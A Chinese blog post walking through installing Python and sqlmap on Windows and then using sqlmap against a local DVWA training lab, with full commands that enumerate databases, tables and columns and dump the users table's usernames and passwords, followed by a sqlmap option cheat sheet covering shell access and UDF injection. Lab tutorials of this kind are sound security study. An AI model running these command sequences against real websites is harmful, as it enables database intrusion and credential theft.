1. 程式人生 > >記一次dvwa sql註入爆庫

記一次dvwa sql註入爆庫

dvwasql註入 python安裝 sqlmap安裝及使用

前期準備

1 sqlmapwindows環境下需要python2.7的支持,python官網下載即可

https://www.python.org/

2 安裝python2.7,默認即可。安裝完成後需要配置下環境變量。右擊計算機->高級系統設置->環境變量,找到系統變量的Path選項,雙擊,在最後添加;C:\Python27“;”必須要有,如果有其他python,可以刪掉。這是我的安裝路徑。

技術分享

3 windows+R,輸入cmd打開dos界面,輸入python進行測試python是否安裝成功。

技術分享

返回python版本號,安裝成功

4 下載sqlmap,可以到我的百度雲下載

:http://pan.baidu.com/s/1skPClzR 密碼:ndpj

解壓後,改名為sqlmap,放到磁盤中

技術分享

5 打開cmd,切換到sqlmap對應磁盤

技術分享

6 至此,sqlmap安裝完畢

開始爆庫

1 dvwa安全級別設置為low,采用的是cookie註入。點擊sql註入,使用burpsuite抓包拿cookie

技術分享

2 urlcookie都需要使用,打開剛才開的cmd,鍵入

Sqlmap.py -u http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit --cookie “security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1” --risk 3 --level 5 ,中途出現選擇項直接回車

技術分享

3 明顯看到有mysql數據庫,先將數據庫顯示出來sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" --dbs

技術分享

4 可以看到有幾個數據庫,然後選擇dvwa數據庫,列表名

sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" -D dvwa --tables

技術分享

5 出現兩個表名,肯定有用的是users表名,然後暴列名

sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" -D dvwa -T users --columns

技術分享

6 看到了很多列名,最有用的當然是用戶和密碼了,導出用戶和密碼

sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" -D dvwa -T users -C user,password,user_id --dump

技術分享

7 好了至此完畢,接下來是sqlmap的命令解釋大全

-u #註入點

-g 谷歌搜索

-f #指紋判別數據庫類型

-b #獲取數據庫版本信息

-p #指定可測試的參數(?page=1&id=2 -p page,id)

-D “” #指定數據庫名

-T “” #指定表名

-C “” #指定字段

-s “” #保存註入過程到一個文件,還可中斷,下次恢復在註入(保存:-s xx.log”  恢復:-s xx.log” –resume)

columns #列出字段

current-user #獲取當前用戶名稱

current-db #獲取當前數據庫名稱

users #列數據庫所有用戶

passwords #數據庫用戶所有密碼

privileges #查看用戶權限(privileges -U root)

-U #指定數據庫用戶

dbs #列出所有數據庫

tables -D “” #列出指定數據庫中的表

columns -T user-D mysql#列出mysql數據庫中的user表的所有字段

dump-all #列出所有數據庫所有表

exclude-sysdbs #只列出用戶自己新建的數據庫和表

dump -T “” -D “” -C “” #列出指定數據庫的表的字段的數據(dump -T users -D master -C surname)

dump -T “” -D “” –start 2 top 4 # 列出指定數據庫的表的2-4字段的數據

dbms #指定數據庫(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)

os #指定系統(Linux,Windows)

--sql -shell shell

--delay 延遲的時間

--safe-freq 次數

-v #詳細的等級(0-6)

0:只顯示Python的回溯,錯誤和關鍵消息。

1:顯示信息和警告消息。

2:顯示調試消息。

3:有效載荷註入。

4:顯示HTTP請求。

5:顯示HTTP響應頭。

6:顯示HTTP響應頁面的內容

privileges #查看權限

is-dba #是否是數據庫管理員

roles #枚舉數據庫用戶角色

udf-inject #導入用戶自定義函數(獲取系統權限)

union-check #是否支持union 註入

union-cols #union 查詢表記錄

union-test #union 語句測試

union-use #采用union 註入

union-tech orderby #union配合order by


本文出自 “11070003” 博客,謝絕轉載!

記一次dvwa sql註入爆庫